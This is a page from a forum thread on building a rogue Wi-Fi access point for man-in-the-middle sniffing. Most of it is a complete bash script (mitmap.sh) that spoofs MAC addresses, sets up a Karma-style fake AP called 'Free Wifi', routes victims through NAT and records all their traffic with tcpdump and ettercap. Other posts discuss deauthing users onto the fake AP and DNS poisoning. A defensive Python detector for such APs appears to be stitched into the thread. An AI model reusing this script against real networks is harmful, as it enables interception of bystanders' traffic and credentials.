Page 7 of 14 (results 61 to 70 of 137)

Thread: Rogue Accesspoint + MitM Sniffing tutorial

  1. #61 (Member, joined Feb 2010, 204 posts)

    I think it's too complicated for newbies to be messing around with.

    The best way is not to post the script but to put it into pastebin; only those that know, with at least some understanding, will use it.

  2. #62 imported_Deathray (Member, joined Oct 2007, 381 posts)

    Yes, that is true indeed hm2075; my script is pure simplicity, but it could stand beside it as an additional option for pentesters on the go.
    I don't know; nevertheless, it is so simple that one could easily add the necessary functions manually.
    - Poul Wittig

  3. #63

    This is all I could do in 30 minutes. It should work as a skeleton for what you want to do; you could finish it if you like. Sadly I have very little time today, but I will see if I can work on it tomorrow, or, if you want, you can improve your coding skills by finishing it. What do you think about my idea?

    Code:
    #!/bin/bash
    #=================================================
    #
    # FILE: mitmap.sh
    #
    # USAGE: ./mitmap.sh <options>
    #
    # DESCRIPTION: Script to launch a fake AP for Man In The Middle attacks
    #
    # OPTIONS: Wireless card supported by Aircrack-ng for injection.
    #	   File with MAC addresses for filtering connections
    #	   Madwifi drivers patched with the DigiNinja Karma patch
    # BUGS: Only has been tested with Atheros, Realtek RTL8187 and Ralink 2750 cards.
    # NOTES: Latest SVN version of Aircrack-ng as well as latest drivers must be used.
    # AUTHOR: Deathray and carlos_perez(at)darkoperator.com
    # VERSION: 0.1
    # CREATED: 12/29/08 
    # REVISION:
    #=================================================
    #Initialize Wireless interface variable
    IW=
    #Initialize interface to be routed to variable
    IE=
    #Initialize mode variable
    MODE=
    #Initialize SSID variable
    SSID="Free Wifi"
    #Initialize Macfilter file Variable
    FILTER="/noexist"
    #Variable with number of arguments passed to the script
    NUM=$#
    #Variable with log file location for troubleshooting
    LOGFILE=/root/mitmap.log
    #Variable for log folder
    LOGFOLDER="/root/"
    A1="ath0"
    #Variable for dhcpd configuration file
    DHCPDCONF="/etc/dhcpd.conf"
    #Catch ctrl-c and proceed to clean up any process left
    trap cleanup INT
    #Usage function for printing the help message
    function usage ()
    {
    	echo "Script for launching Fake AP to perform Man in The Middle Attack"
    	echo "Based on script and Tutorial by Deathray at http://forums.remote-exploit.org"
    	echo "Usage:"
    	echo "./mitmap.sh -m <mode> -i <wireless interface> -o <internet interface> <options>"
    	echo ""
    	echo "Modes:"
    	echo ""
    	echo "ap		:Access Point using Airbase-ng"
    	echo "apf		:Access Point using Airbase-ng and MAC Filtering"
    	echo "apa		:Access Point using Digininja patched Madwifi kernel modules"
    	echo "apaf		:Access Point using Digininja patched Madwifi Kernel modules and MAC filtering"
    	echo ""
    	echo "Options:"
    	echo ""
    	echo "-s <ssid> 	:SSID to use for the Fake AP"
    	echo "-f <text file>	:text file containing MAC addresses to use as filter one per line"
    	echo "-d <dhcpd conf>	:Dhcpd configuration file"
    	echo "-h 		: This help message"
    }
    #Airbase-ng Karma style interface initialization
    function abngkinit ()
    {
    	if [ "$IW" == "$A1" ]; then
    		ifconfig $IW down >> $LOGFILE 2>&1 &
    		wlanconfig ath0 destroy >> $LOGFILE 2>&1 &
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A wifi0
    		airmon-ng start wifi0 >> $LOGFILE 2>&1 &
    		sleep 2
    	else
    		ifconfig $IW up >> $LOGFILE 2>&1 &
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A $IW
    		airmon-ng start $IW >> $LOGFILE 2>&1 &
    		sleep 2
    	fi
    	modprobe tun	
    	echo -e "\033[1;32mstarting fake ap\033[1;37m"
    	airbase-ng -P -C 30 -e "$SSID" $IW >> $LOGFILE 2>&1 &
    	#give enough time before next command for interface to come up
    	#specialy on Virtual Machines with USB cards
    	echo "This will take 15 seconds .............."
    	#$IW = "at0"
    	sleep 15
    	#changing MTU size for Interface
    	echo -e "\033[1;32mChanging MTU Size for At0 to 1400\033[1;37m"
    	ifconfig at0 mtu 1400
    	IW="at0"
    
    }
    #Airbase-ng Karma style interface initialization with MAC Address Filtering
    function abngkinitfiltered ()
    {
    	if [ "$IW" == "$A1" ]; then
    		ifconfig $IW down >> $LOGFILE 2>&1 &
    		wlanconfig ath0 destroy >> $LOGFILE 2>&1 &
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A wifi0
    		airmon-ng start wifi0 >> $LOGFILE 2>&1 &
    		sleep 2
    	else
    		ifconfig $IW up >> $LOGFILE 2>&1 &
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A $IW
    		airmon-ng start $IW >> $LOGFILE 2>&1 &
    		sleep 2
    	fi
    	modprobe tun	
    	echo -e "\033[1;32mstarting fake ap with filtering\033[1;37m"
    	airbase-ng -P -C 30 -e "$SSID" --clients $FILTER $IW >> $LOGFILE 2>&1 &
    	#give enough time before next command for interface to come up
    	#specialy on Virtual Machines with USB cards
    	echo "This will take 15 seconds .............."
    	#$IW = "at0"
    	sleep 15
    	#changing MTU size for Interface
    	echo -e "\033[1;32mChanging MTU Size for At0 to 1400\033[1;37m"
    	ifconfig at0 mtu 1400
    	IW="at0"
    
    }
    #DigiNinja Atheros Karma interface initialization
    function mdwfkinit ()
    {
    	#Based on HD original karmetasploit scripts 
    	find /proc/net -name 'ath?' | sed -e 's/.*ath/ath/g' | xargs -i wlanconfig {} destroy
    	echo Master Mode: `wlanconfig ath0 create wlandev wifi0 wlanmode ap`
    	macchanger -A ath0
    
    	# Enable KARMA mode
    	iwpriv ath0 karma 1
    	if [ $? -ne 0 ] ; then
    		echo -e "\033[1;31mThe Madwifi Drivers appear to not have the karma patch applied\033[1;37m"
    		echo -e "\033[1;31mhttp://www.darkoperator.com/madwifi-r3726-Karma-Aircrack-ng-patched-hdm-i386-1.lzm\033[1;37m"	
    		cleanup
    	else
    		echo -e "\033[1;32mStarting Atheros Card in Karma Mode Successful\033[1;37m"
    	fi
    
    	# Configure the interface
    	iwconfig ath0 mode master
    	iwconfig ath0 channel 6
    	iwconfig ath0 essid "$SSID"
    	ifconfig ath0 up 10.0.0.1 netmask 255.255.255.0
    
    }
    #DigiNinja Atheros Karma MAC Address Filtering
    function mdwfkinitfiltered ()
    {
    	if [ -e $FILTER ]; then
    		echo -e "\033[1;32mStarting fake ap with MAC Filtering\033[1;37m"
    		for M in `cat $FILTER`; do
    			iwpriv ath0 addmac $M
    		done 
    		iwpriv ath0 maccmd 1
    	else
    		echo -e "\033[1;31mFilter File does not exist\033[1;37m"
    		echo $FILTER
    		#cleanup
    	fi
    }
    #Router with NAT Initialization
    function routerinit ()
    {
    	#Clear any dhcp leases that might have been left behind
    	echo > /var/state/dhcp/dhcpd.leases
    	#start dhcpd daemon with special configuration file; dhcpd forks into the
    	#background itself, so run it in the foreground and check its exit status
    	dhcpd -cf $DHCPDCONF $IW >> $LOGFILE 2>&1
    	if [ $? -ne 0 ] ; then
    		echo -e "\033[1;31mThe DHCPD server could not be started exiting\033[1;37m"
    		cleanup
    	else
    		echo -e "\033[1;32mDHCPD started successfully\033[1;37m"
    	fi
    	sleep 2
    	#capture all packets
    	echo -e "\033[1;32mStarting Packet capture to /root/apmitm.cap\033[1;37m"
    	tcpdump -ni $IW -s 0 -w /root/apmitm.cap >/dev/null 2>&1 &
    	route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    	iptables --flush
    	iptables --table nat --flush
    	iptables --delete-chain
    	iptables --table nat --delete-chain
    	iptables -P FORWARD ACCEPT
    	iptables -t nat -A POSTROUTING -o $IE -j MASQUERADE
    	echo "1" > /proc/sys/net/ipv4/ip_forward
    	ettercap -T -q -p -i $IW && cleanup
    }
    #Cleanup of all running processes
    function cleanup ()
    {
    	iptables --flush
    	iptables --table nat --flush
    	iptables --delete-chain
    	echo "0" > /proc/sys/net/ipv4/ip_forward
    	killall -9 dhcpd tcpdump airbase-ng >> $LOGFILE 2>&1 &
    	echo > /var/state/dhcp/dhcpd.leases
    	airmon-ng stop $IW >> $LOGFILE
    	if [ "$MODE" == "apa" ] || [ "$MODE" == "apaf" ]; then
    		iwpriv ath0 maccmd 1 >> $LOGFILE 2>&1 &
    	fi 
    	exit 1
    
    }
    #--------------------MAIN-----------------------
    #option string must list every flag the usage message documents (-o, -d and -h were missing)
    while getopts ":m:i:f:s:o:d:h" options; do
      case $options in
        m ) MODE=$OPTARG;;
        i ) IW=$OPTARG;;
        f ) FILTER=$OPTARG;;
        s ) SSID=$OPTARG;;
        o ) IE=$OPTARG;;
        d ) DHCPDCONF=$OPTARG;;
        h ) usage
            exit 0;;
        \? ) usage
             exit 1;;
        * ) usage
              exit 1;;
    
      esac
    done
    if [[ -n "$MODE" && -n "$IW" ]]; then
    
    	case $MODE in
    	ap) abngkinit 
         		routerinit;;
    	apf) abngkinitfiltered
          		 routerinit;;
    	apa) mdwfkinit
    		routerinit;;	
    	apaf) mdwfkinit
    		mdwfkinitfiltered
    		routerinit;;	
    	esac
    else
    	usage
    fi

  4. #64 imported_Deathray (Member, joined Oct 2007, 381 posts)

    Exciting to read, as a lot of the stuff you have done I have always wondered how to do (: Although I am beginning to think that it may be a bit more complex than necessary. I think there is more room for things to go wrong, and it will be harder for people to troubleshoot when the script is as complex as it is. I don't know, I just think it will be a daunting task to get right. It would be great if it worked 100% for 99% of the people that actually will use it. But the question is how many people would bother?
    I'm thinking of upgrading the original script to do something like this:

    Select rogue ap type:
    1 Offensive AP ( airbase-ng -e "$ESSID" -P -C 30 -v $WIFACE & )
    2 Non-Offensive AP ( airbase-ng -e "$ESSID" -v $WIFACE & )
    3 Manual AP ( Configure airbase-ng options manually )

    If that were to be implemented in a simple way I would be happy :P
    - Poul Wittig
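A defender-side counterpart to the "Offensive AP" option above, added here as an example and not code from this thread or from airbase-ng: with -P the AP answers every probe request with the SSID the client asked for, so a monitor-mode capture shows one BSSID responding for many unrelated SSIDs. The log line format, the threshold and the sample probe responses are constructed for this example.

```python
"""Flag BSSIDs that answer probe requests for many distinct SSIDs.
A Karma-style (airbase-ng -P) rogue AP replies with whatever SSID each client
probes for, so one BSSID appears to serve unrelated networks.
Log line format and sample data are constructed for this example.
"""
import re
from collections import defaultdict

# Constructed sample lines: one frame per line, "bssid=.. ssid=..".
# 00:11:22:33:44:55 behaves like a normal AP; aa:bb:cc:dd:ee:ff echoes back
# every SSID it is asked for, which is the Karma signature we look for.
SAMPLE_LOG = """\
probe-resp bssid=00:11:22:33:44:55 ssid=CorpWiFi
probe-resp bssid=00:11:22:33:44:55 ssid=CorpWiFi
probe-resp bssid=00:11:22:33:44:55 ssid=CorpGuest
probe-resp bssid=AA:BB:CC:DD:EE:FF ssid=CorpWiFi
probe-resp bssid=aa:bb:cc:dd:ee:ff ssid=Free Wifi
probe-resp bssid=aa:bb:cc:dd:ee:ff ssid=HomeNet-5G
probe-resp bssid=aa:bb:cc:dd:ee:ff ssid=linksys
beacon bssid=aa:bb:cc:dd:ee:ff ssid=Free Wifi
probe-resp bssid=aa:bb:cc:dd:ee:ff ssid=Starbucks
"""

LINE_RE = re.compile(r"^probe-resp bssid=(?P<bssid>[0-9a-fA-F:]{17}) ssid=(?P<ssid>.*)$")

def parse_probe_responses(text):
    """Yield (bssid, ssid) from probe-response lines; other frame types are ignored."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            # Normalise case so the same radio is not counted twice.
            yield m.group("bssid").lower(), m.group("ssid")

def ssids_per_bssid(text):
    """Map each BSSID to the set of distinct SSIDs it has responded with."""
    seen = defaultdict(set)
    for bssid, ssid in parse_probe_responses(text):
        seen[bssid].add(ssid)
    return dict(seen)

def karma_suspects(text, threshold=3):
    """Return BSSIDs that responded for more than `threshold` distinct SSIDs."""
    return sorted(b for b, s in ssids_per_bssid(text).items() if len(s) > threshold)

if __name__ == "__main__":
    for bssid in karma_suspects(SAMPLE_LOG):
        count = len(ssids_per_bssid(SAMPLE_LOG)[bssid])
        print(f"possible Karma-style rogue AP: {bssid} ({count} distinct SSIDs)")
```

A legitimate multi-SSID AP will also exceed a low threshold, so tune it to the number of SSIDs your own infrastructure actually advertises.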

  5. #65

    Sorry for overdoing it bro, I tried to adjust it to my own needs; different needs, different approaches. I tend to write scripts and options as if I'm in the middle of an engagement and thinking of anything that I might need. As you will later see it's not that complex; I do put lots of checks and balances in my scripts. One thing to recommend is the clean up. Why? Any settings left in routing or in iptables might bite you as you switch attacks. Looking forward to your final script.

  6. #66 (Member, joined Feb 2010, 204 posts)

    Excellent work there, maybe throw in our wireless key harvester.

    hehehe

    Anyway, we still haven't got a "deauth a user and force them to connect to our AP" function yet; I think this has already been mentioned on the airbase-ng tickets.

  7. #67 (Member, joined Jun 2007, 218 posts)

    Originally posted by BadKarmaPR:

        echo "1" > /proc/sys/net/ipv4/ip_forward
        ettercap -T -q -p -i $IW && cleanup

    When ettercap starts up it turns off any kernel forwarding unless you use the -u option for unoffensive mode.

  8. #68 (Junior Member, joined Sep 2008, 85 posts)

    echo "1" > /proc/sys/net/ipv4/ip_forward

    Could someone please explain what this step does? I am trying to replicate the script manually and I'm not sure what to do for this step...
    Patience is appreciated =]

  9. #69 (Member, joined Sep 2008, 146 posts)

    If you want to use ettercap you should start it THEN enable forwarding. I've had much better success doing that, because EC tries to forward for you; then you can set everything right by echo "1" > /proc/sys/net/ipv4/ip_forward. I haven't tried the -u option yet; hopefully that would do the same thing.

    For all those folks out there having trouble trying to run the script: if you open up bash and put in each line yourself it is much easier to see what is and isn't working. Also start Wireshark. If you Wireshark your TUN interface and the NIC connected to the internet you can watch the packet transfers (or lack thereof) and diagnose a lot of the problems. It's all about doing one thing at a time and trial and error; everyone has different software/hardware, so these scripts aren't going to work for many of you without a little modification.

    One last thing HM2075, I've been having some trouble getting that dnspoison program you used to work; are there any tuts online that you could point to? It seems a little crazy to have to set up a bind server to do a simple redirection, which is what I've tried so far, and ettercap's dns spoof plugin is just crap.
    Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."

    Neo: "What if I take both?"

    Morpheus: "Don't do that! You end up like Nick Nolte!"

  10. #70

    Quote originally posted by benzslr123:

        echo "1" > /proc/sys/net/ipv4/ip_forward

        Could someone please explain what this step does? I am trying to replicate the script manually and I'm not sure what to do for this step...

    Turns on IP forwarding on your box, so it will act as a router and forward packets.

